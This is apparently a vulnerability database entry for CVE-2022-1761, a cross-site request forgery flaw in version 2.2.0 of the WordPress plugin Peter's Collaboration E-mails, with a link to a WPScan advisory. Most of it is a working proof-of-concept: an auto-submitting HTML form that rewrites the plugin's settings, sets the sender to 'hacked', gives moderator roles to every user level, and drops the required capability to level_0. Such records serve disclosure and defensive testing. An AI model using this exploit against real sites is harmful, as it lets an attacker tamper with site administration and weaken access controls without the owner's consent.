CVE: CVE-2022-1761

Name: Peter’s Collaboration E-mails (peters-collaboration-e-mails)

Version: 2.2.0

Date: 2022-04-20 22:07:23

Advisory: https://wpscan.com/vulnerability/31b413e1-d4b5-463e-9910-37876881c062

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
    <input type="text" name="pce_blogname" value="hacked">
    <input type="text" name="pce_fromaddress" value="hacked@example.com">
    <input type="text" name="pce_fromname" value="hacked">
    <input type="text" name="pce_whoapproved" value="1">
    <input type="text" name="pce_contributor_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="administrator">
    <input type="text" name="pce_moderator_roles[]" value="author">
    <input type="text" name="pce_moderator_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="editor">
    <input type="text" name="pce_moderator_roles[]" value="subscriber">
    <input type="text" name="pce_emails_to_send[]" value="pending">
    <input type="text" name="pce_emails_to_send[]" value="approved">
    <input type="text" name="pce_emails_to_send[]" value="future">
    <input type="text" name="pce_emails_to_send[]" value="backtodraft">
    <input type="text" name="pce_emails_to_send[]" value="wentlive">
    <input type="text" name="pce_emails_to_send[]" value="private_to_published">
    <input type="text" name="pce_emails_to_send[]" value="edited">
    <input type="text" name="pce_required_capability" value="level_0">
    <input type="text" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
    document.forms[0].submit();
</script>